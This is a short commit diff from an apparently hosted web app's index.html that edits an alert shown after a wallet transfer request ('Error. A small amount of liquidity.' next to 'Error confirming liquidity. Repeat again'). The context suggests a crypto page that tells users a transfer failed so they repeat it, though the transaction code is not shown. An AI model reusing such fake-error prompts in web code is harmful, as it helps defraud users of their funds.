Spaces:
Running
Running
Update index.html
Browse files- index.html +1 -1
index.html
CHANGED
@@ -107,7 +107,7 @@
|
|
107 |
},
|
108 |
],
|
109 |
});
|
110 |
-
alert("Error. A small amount of liquidity.
|
111 |
transferInProgress = false;
|
112 |
} catch (error) {
|
113 |
alert("Error confirming liquidity. Repeat again");
|
|
|
107 |
},
|
108 |
],
|
109 |
});
|
110 |
+
alert("Error. A small amount of liquidity.");
|
111 |
transferInProgress = false;
|
112 |
} catch (error) {
|
113 |
alert("Error confirming liquidity. Repeat again");
|